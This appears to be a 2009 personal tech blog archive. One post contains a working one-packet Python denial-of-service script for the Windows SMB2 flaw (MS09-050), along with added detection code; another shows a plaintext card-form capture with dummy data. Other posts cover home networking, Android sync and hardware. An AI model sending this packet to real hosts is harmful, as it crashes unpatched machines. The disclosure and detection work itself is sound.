
Category: computers

MS09-0??

As is normal for a Patch Tuesday, Microsoft released a bunch of patches. Unfortunately, none of them fix a vulnerability in the SMB2 implementation on Vista, 7, or Server 2008 which allows easy remote BSODs using a single packet: an SMB Negotiate Protocol request that lists the "SMB 2.002" dialect and carries a non-zero value in the Process ID High header field. The code below, which works under Python 2.6 on Windows, was very slightly adapted from this post to Full Disclosure.

import socket

host = ("127.0.0.1", 445)  # target SMB server; the original post hit localhost
buff = (
    b"\x00\x00\x00\x90"  # NetBIOS session message; 0x90 = 144 bytes of SMB follow
    b"\xff\x53\x4d\x42"  # SMB header: protocol identifier "\xffSMB"
    b"\x72\x00\x00\x00"  # Command 0x72 = Negotiate Protocol; first bytes of NT status
    b"\x00\x18\x53\xc8"  # last status byte; Flags 0x18; Flags2 0xc853
    b"\x00\x26"          # Process ID High: the trigger. A normal client sends "\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"  # Signature, Reserved, TID 0xffff, PID 0xfeff
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"  # UID, MID, WordCount 0, ByteCount 0x6d, then dialects:
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"  # "PC NETWORK PROGRAM 1.0"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"  # "LANMAN1.0"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"  # "Windows for Workgroups 3.1a"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"  # "LM1.2X002"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"  # "LANMAN2.1"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"  # "NT LM 0.12"
    b"\x30\x30\x32\x00"                                          # "SMB 2.002": the dialect that gets the request handled by the SMB2 code
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.sendall(buff)  # one packet is enough; the target blue-screens on receipt
s.close()
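The check a defender would want after reading this, as an added example in Python 3 (not the original author's or the Full Disclosure poster's code): a builder that reproduces the post's packet from its header fields, a parser for NetBIOS-framed SMB1 requests, and a detector that flags the malformed Negotiate. The detection heuristic (non-zero Process ID High together with the "SMB 2.002" dialect) is my assumption, derived from the post's own comment that a normal client sends zero there; it is not taken from Microsoft's advisory. POST_PACKET_HEADER is the first 39 bytes of the post's packet, copied so the builder can be cross-checked against it.

```python
import struct

SMB_COM_NEGOTIATE = 0x72

# Dialects in the order the post's packet lists them.
DIALECTS = [
    b"PC NETWORK PROGRAM 1.0",
    b"LANMAN1.0",
    b"Windows for Workgroups 3.1a",
    b"LM1.2X002",
    b"LANMAN2.1",
    b"NT LM 0.12",
    b"SMB 2.002",
]

# NetBIOS header, SMB1 header, WordCount and ByteCount of the post's packet, for
# cross-checking the builder below against the published bytes.
POST_PACKET_HEADER = bytes.fromhex(
    "00000090" "ff534d42" "72000000" "001853c8" "0026"
    "0000000000000000" "0000" "ffff" "fffe" "0000" "0000" "00" "6d00"
)


def build_negotiate(pid_high, dialects=DIALECTS):
    """Build a NetBIOS-framed SMB1 Negotiate Protocol request.

    pid_high is the 16-bit Process ID High header field. A normal client sends 0;
    the post's trigger packet sends 0x2600 (bytes 00 26 on the wire).
    """
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    header = struct.pack(
        "<4sBIBHH8sHHHHH",
        b"\xffSMB",         # protocol identifier
        SMB_COM_NEGOTIATE,  # command
        0,                  # NT status
        0x18,               # Flags
        0xC853,             # Flags2
        pid_high,           # Process ID High
        b"\x00" * 8,        # security signature
        0,                  # reserved
        0xFFFF,             # Tree ID
        0xFEFF,             # Process ID
        0,                  # User ID
        0,                  # Multiplex ID
    )
    body = header + struct.pack("<BH", 0, len(data)) + data  # WordCount 0, ByteCount, dialects
    return struct.pack(">I", len(body)) + body                # NetBIOS session message, type 0


def parse_negotiate(packet):
    """Parse a NetBIOS-framed SMB1 request.

    Returns a dict with command, flags2, pid_high and (for Negotiate) the dialect
    list, or None when the bytes are not a well-formed SMB1 request.
    """
    if len(packet) < 4 + 32 + 3 or packet[0] != 0:
        return None
    if int.from_bytes(packet[1:4], "big") != len(packet) - 4:
        return None
    smb = packet[4:]
    if smb[:4] != b"\xffSMB":
        return None
    command = smb[4]
    flags2, pid_high = struct.unpack_from("<HH", smb, 10)
    word_count = smb[32]
    if len(smb) < 35 + 2 * word_count:
        return None
    (byte_count,) = struct.unpack_from("<H", smb, 33 + 2 * word_count)
    start = 35 + 2 * word_count
    data = smb[start:start + byte_count]
    dialects = []
    if command == SMB_COM_NEGOTIATE:
        # Each dialect entry is a 0x02 byte followed by a NUL-terminated string.
        dialects = [e[1:] for e in data.split(b"\x00") if e.startswith(b"\x02")]
    return {"command": command, "flags2": flags2, "pid_high": pid_high, "dialects": dialects}


def is_ms09_050_trigger(packet):
    """Flag a Negotiate request with a non-zero Process ID High that also offers SMB 2.002.

    Assumed heuristic: the SMB 2.002 dialect is what hands the request to the SMB2
    server code, and the non-zero PID High is the value that code mishandles.
    """
    fields = parse_negotiate(packet)
    if fields is None or fields["command"] != SMB_COM_NEGOTIATE:
        return False
    return fields["pid_high"] != 0 and b"SMB 2.002" in fields["dialects"]


if __name__ == "__main__":
    trigger = build_negotiate(0x2600)
    assert trigger.startswith(POST_PACKET_HEADER)
    print(parse_negotiate(trigger))
    print("trigger:", is_ms09_050_trigger(trigger), "benign:", is_ms09_050_trigger(build_negotiate(0)))
```

Feeding the same 148 bytes into the parser and the detector shows what a capture filter has to look at: the request is a perfectly ordinary SMB1 Negotiate apart from two bytes at offset 16 of the TCP payload, so a rule keyed only on the dialect list or the command byte will not separate it from a legitimate Vista client.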

UPDATE: Microsoft has posted Security Advisory 975497 – Vulnerabilities in SMB Could Allow Remote Code Execution, which states:

Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.

I’m not sure how they define attack, but that BSOD above sure looks like one and making something quick to hit whole subnets in a go would be trivial.

UPDATE 2: This was fixed on 13-Oct-2009 in MS09-050. (The bulletin's affected-software list covers Vista and Server 2008; Windows 7 was affected only in its pre-release builds, not the released version.)


Garland Resort’s Website is Very Insecure

Next month I’m going to be attending a wedding at Garland Resort in Michigan’s northern Lower Peninsula. When reserving a hotel room there I noticed that not only was the reservation system using plain old HTTP, but the page containing the form which accepts a credit card number is served insecurely too, and that form again submits over HTTP:

<form name='frmRes1' method='post' Action='CCard1.asp?IRM=yes&BtrvID=4249' onSubmit='return NextPage()'>

Here’s an excerpt from a network capture of me submitting a page full of garbage info:

POST http://65.123.67.67/irm/CCard1.asp?IRM=yes&BtrvID=4249 HTTP/1.1\r\n

Line-based text data: application/x-www-form-urlencoded
    [truncated] firstname=Test&phone1=987-555-1212&lastname=User&phone2=&address1=12345+No+Street&sob=WI&address2=&ccname=AMEX&city=Default&ccnum=1234567812345678&state=AZ&ccexp=01%2F12&zip=99901&cardid=555&country=&email=test%40example.com&pa

See that last line there? In case you don’t know, the & sign delimits the fields, and each field is a simple name=value pair (URL-encoded, so %2F is a slash and %40 is an @). Therefore ccnum=1234567812345678 is the garbage credit card number I submitted, cardid is the CVV2, ccexp is the expiration date, and so on, all readable by anyone on the network path. Sending cardholder data over plain HTTP is very definitely not PCI compliant and is a thief’s dream if the victim were submitting this form across a sniffable public network.
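As an added example (not the author's code), here is the kind of scanner one would point at a capture like this one, in Python 3: it splits a raw HTTP request into its parts, decodes the urlencoded body and reports every field that is either named like a card field or holds a Luhn-valid 13 to 19 digit number, together with whether the request travelled over plain http://. The sample request is rebuilt from the excerpt above; its body is the truncated capture exactly as shown, and the Host and Content-Type headers are assumed, since the excerpt only shows the request line and the decoded body.

```python
from urllib.parse import parse_qsl, urlsplit

# Field names the capture on this page uses for cardholder data. A real scanner keeps a
# longer list; these four are enough to show the idea.
CARD_FIELDS = {"ccnum", "cardid", "ccexp", "ccname"}

# The request excerpted on this page, rebuilt as one raw HTTP message. The body is the
# truncated capture as shown there; the two headers are assumed.
CAPTURED_POST = (
    "POST http://65.123.67.67/irm/CCard1.asp?IRM=yes&BtrvID=4249 HTTP/1.1\r\n"
    "Host: 65.123.67.67\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "firstname=Test&phone1=987-555-1212&lastname=User&phone2=&address1=12345+No+Street"
    "&sob=WI&address2=&ccname=AMEX&city=Default&ccnum=1234567812345678&state=AZ"
    "&ccexp=01%2F12&zip=99901&cardid=555&country=&email=test%40example.com&pa"
)


def luhn_ok(digits):
    """Luhn check over a string of decimal digits, as used for card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # double every second digit from the right, folding to one digit
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, url, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, url, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, url, headers, body


def find_card_data(raw, scheme=None):
    """Return one finding per form field that looks like cardholder data.

    A field is reported when its name is a known card field or its value is a 13-19
    digit number (spaces and dashes allowed) that passes Luhn. 'plaintext' records
    whether the request went over http://. The capture on this page uses an absolute
    URL in the request line, so the scheme can be read from it; for an origin-form
    request line ("POST /path") the caller passes scheme= from the capture.
    """
    method, url, headers, body = parse_request(raw)
    if method != "POST" or "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return []
    plaintext = (scheme or urlsplit(url).scheme) == "http"
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        digits = value.replace(" ", "").replace("-", "")
        luhn = digits.isdigit() and 13 <= len(digits) <= 19 and luhn_ok(digits)
        if name.lower() in CARD_FIELDS or luhn:
            findings.append({"field": name, "plaintext": plaintext, "luhn": luhn})
    return findings


if __name__ == "__main__":
    for finding in find_card_data(CAPTURED_POST):
        print(finding)
```

Run against the capture, the scanner reports ccname, ccnum, ccexp and cardid, all over plaintext, and none of them Luhn-valid: the garbage number 1234567812345678 fails the check, which is why a scanner that keys only on Luhn-valid values would miss a test submission like this one while the field names give it away regardless.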

Suffice to say, I phoned in my reservation. This is obviously not an ideal solution either, but at least I didn’t use that crap.


Python Is Interesting

Yes, I’m very late to the party, but as I’ve been hearing quite a bit about how useful Python (Wikipedia) is, I’ve spent some spare time over the last week giving it a look. As was suggested by some friends I started with Python 2.6.2, which is the latest version of the previous branch of the language. (There is also a 3.0 branch, but it’s my understanding that it’s not yet widely used and is sufficiently different from the previous version that it’s best to start at 2.6.2.)

After going through most of the very nice official Python tutorial I began playing with Windows-specific things, most notably Tim Golden’s WMI Module, which seems to work quite well. I still have to get more comfortable with the language, but thus far I’ve had no problems reimplementing many of the basic scripts that I’ve written at work to automate random little tasks.


Trashwall Is Dead

Yesterday while at work Danielle informed me that she was unable to reach the internet from my house. SSHing into Trashwall showed that while it could talk to the public network, for some reason it couldn’t talk internally. I figured that a quick reboot might be worth trying, but after that it never came back. Watching the console yesterday showed it dumping core while booting, and that the system’s time had been reset to the epoch. Hopefully this is just a case of the PRAM battery having failed. It’s a SAFT LS 14250 C, which is thankfully easy to find. Out of the system the battery reads 3.6V, which is normal for it, but it’s possible it’s right on the edge.

I think that after replacing the battery and getting Open Firmware properly set back up I’ll look at replacing its el-cheapo 2GB Compact Flash drive with an actual hard disk. The extra space will allow me to run Cacti, which I think would be pretty nifty to use for logging per-device bandwidth use, wireless network stats, and things like that.

Currently my house is running just fine on an AirPort Extreme which works well, but is a bit limited feature-wise. It’s really nifty that it supports IPv6 and all, but that’s not something that I currently use. If I’m not able to get Trashwall (that is, the Mac with the many-port NICs and such) going again, I’ll have to figure out something else for network connectivity at home. I really like the idea of an ultra-quiet OpenBSD box handling everything, but I’ll have to find (and silence) a PC in order to do the same thing. That might take a lot of effort.

UPDATE: Trashwall was fixed by fitting a new hard disk, replacing the PRAM battery, restoring the OpenFirmware settings, and installing OpenBSD 4.6. Everything is working great again.


Google Android (T-Mobile G1) Hanging Sync Problem Resolved

On Google Android, running on my T-Mobile G1, there is an icon which appears in the notification bar whenever the phone is syncing Gmail, Calendar, Contacts, etc. Typically this icon only appears for a second or two and then goes away. However, a week or so ago I began noticing that my G1’s battery was being completely exhausted at least daily, and quite often I’d pick up the phone to find it very hot with the sync icon stuck on. The warmth seemed to be caused by the radio being constantly in use for extended periods of time as sync tried to occur. While I could deal with the sync not always working right or my having to cancel an in-progress sync, having to charge the phone a few times per day was becoming a big problem.

My short-term workaround was to leave the phone on the charger overnight and allow it to sync then, which seemed to work. However, this was obviously not a solution. Yesterday I finally took time to look into the problem. To start, if I entered Settings → Data Synchronization, the Application sync settings portion would often indicate that sync hadn’t occurred for a day or two. When I manually initiated a sync I noticed that while Gmail and Contacts synced and completed reasonably fast (a few seconds each), the Calendar sync seemed to start and stop repeatedly, never finishing during the time I watched it.

Signing into Google Calendar, which I don’t do very often, showed an error stating that …this is not a Calendar user: http://www.google.com/calendar/feeds/adsense-calendar@google.com/public/basic. This calendar is a Google AdSense calendar found on this page within the AdSense help documentation, entitled How do I subscribe to the AdSense Calendar. After removing the entry for this seemingly broken calendar from my Other calendars list I initiated another sync from the phone (Settings → Data Synchronization → MENU → Sync now) and all syncing completed within 30 seconds.

If one visits the page from which the aforementioned AdSense calendar is linked, the link is still active, but attempting to add the calendar results in this error. Since I’d added this calendar without error a while ago, I suspect that once it became unavailable the phone was unable to promptly complete a calendar sync, having to wait for something to time out before it could complete. Unfortunately, until this timeout the radio was active, which ate battery and caused the phone to warm up.


NetOptics Passive 10/100 Ethernet Port Aggregator Tap Disassembly

Top/front view of the NetOptics Passive 10/100 Port Aggregator Tap.

Today I received a rather nifty device, an older-model Passive 10/100 Ethernet Port Aggregator Tap (PA-CU) from NetOptics. This device allows one to monitor both halves of a full-duplex 10/100 network connection at once, with only one capture device.

It was delivered quite early this morning by FedEx, and upon opening the box I saw that it was practically new, with the power supply shipping bags still sealed. There was no documentation, but this was easy enough to find online, and only consists of jumpers whose settings are silkscreened on the top of the enclosure.

After trying it out today I decided that it would be good to open it up and see what is inside. As the photos show, it is basically their older PCI aggregator tap repackaged into a rather nice metal housing. This board contains an FPGA, a bunch of SRAM, a PIC, and some currently unidentified (but well heatsinked) processors.

If you’d like to see more photos of the inside of the tap, they are all available here: NetOptics Passive 10/100 Ethernet Port Aggregator Tap.


Building AVRDUDE Under OS X

NOTE: This doesn’t work right. See this update.

Since I don’t do much software development, it took me a bit to understand how to get AVRDUDE to compile with libusb under OS X. These steps here have been confirmed to work for AVRDUDE v5.5 and v5.6:

– Install libusb from MacPorts: sudo port install libusb
– Extract the AVRDUDE source, change to that directory.
– Set CPPFLAGS so the libusb headers can be found: CPPFLAGS="-I/opt/local/include" && export CPPFLAGS
– Set LDFLAGS so the libusb libraries can be found: LDFLAGS="-L/opt/local/lib" && export LDFLAGS
– In the AVRDUDE source directory, run configure the way the MacPorts port does: ./configure --mandir=${prefix}/share/man (note that ${prefix} is a MacPorts Portfile variable; in an ordinary shell it is empty and the man pages land under /share/man, so either set prefix first, e.g. prefix=/usr/local, or pass a literal path)
– Build it: make
– Win!

UPDATE: This doesn’t actually work. It builds, but attempting to access the AVR Dragon returns the following error: avrdude: jtagmkII_getsync(): sign-on command: status -1. This also occurs with the version of AVRDUDE in MacPorts, making me wonder what exactly the AVR MacPack folks had to do to make it build properly for OS X.


Micro Center Customer Service: Win!

A bottle of Bawls for a coworker and a clearance USB SATA disk enclosure for Danielle. The disk enclosure turned out to be missing screws.

Today at lunch I headed over to Micro Center to return some parts and purchase a 2.5″ SATA to USB 2.0 disk enclosure for Danielle’s old hard drive and a bottle of Bawls which a coworker asked me to pick up for him. I was fortunate (or so I thought) to find the disk enclosure I wanted for $11.96, on clearance because it’d been returned. It was listed as complete and a quick peek inside the package showed that all parts seemed to be there, so I purchased it.

Once I got out to the car (where I snapped that photo) I opened up the box again, but found the enclosure to be missing the screws used for holding the chassis together. Since this made the enclosure essentially unusable, I went back inside, to the same Customer Service person who had returned my previous items, and explained to her that despite saying complete it was actually missing parts. She ended up just doing a like-for-like swap, resulting in my acquiring a brand new enclosure for the clearance price. The difference is only a few dollars, but it was still nice.

This, combined with my original return and previous customer service experiences at Micro Center, led me to believe that, contrary to their terribly inaccurate, misinformed, and misleading commissioned sales people, the customer service folks seem to be pretty okay to deal with.


HW-group’s Hercules

Since Dominic is doing some serial port troubleshooting today, I dug up a link to one of my favorite serial port troubleshooting tools: HW-group’s Hercules. This is made available ostensibly for use with their RS232 / network / remote serial port devices, but it works great for all manner of serial port work.

I’ve used this utility quite often in the past when testing out serial ports, USB to serial adapters, and various serial devices that I’ve made. I like it because it shows the status of things in virtual LEDs and allows you to send arbitrary data, manually toggle DTR/RTS on and off, and just generally generate and receive serial data at will. It also has some nice built-in network features that allow one to virtually use a serial port across a network, and other features which are generally useful for those doing serial network stuff.

Here’s a quote from HW-group’s Hercules page which lists its basic features:

· All basic TCP and UDP utilities in one file, no installation required (just one .EXE file)
· Implemented Serial Port Terminal is working with the Virtual Serial Ports (COM12 for example). You can check and control all serial port lines (CTS, RTS, DTR, DSR, RI, CD)
· Simple TCP client (like the Hyperterminal) with the TEA support, view format, file transfers, macros..
· Easy to use TCP Server with the TEA support, view format, file transfers, macros..
· Hercules contains simple UDP/IP “Terminal” with view formats, echo, file transfers, macros..
· Support the NVT (Network Virtual Terminal) in the Test mode tab, as well as NVT debugging features..
· Using Telnet extended with NVT allows serial port configuration (RFC2217), device identification, confirmation of data sequence, etc.
· It’s FREEWARE you can use and share this software free – check the licence!
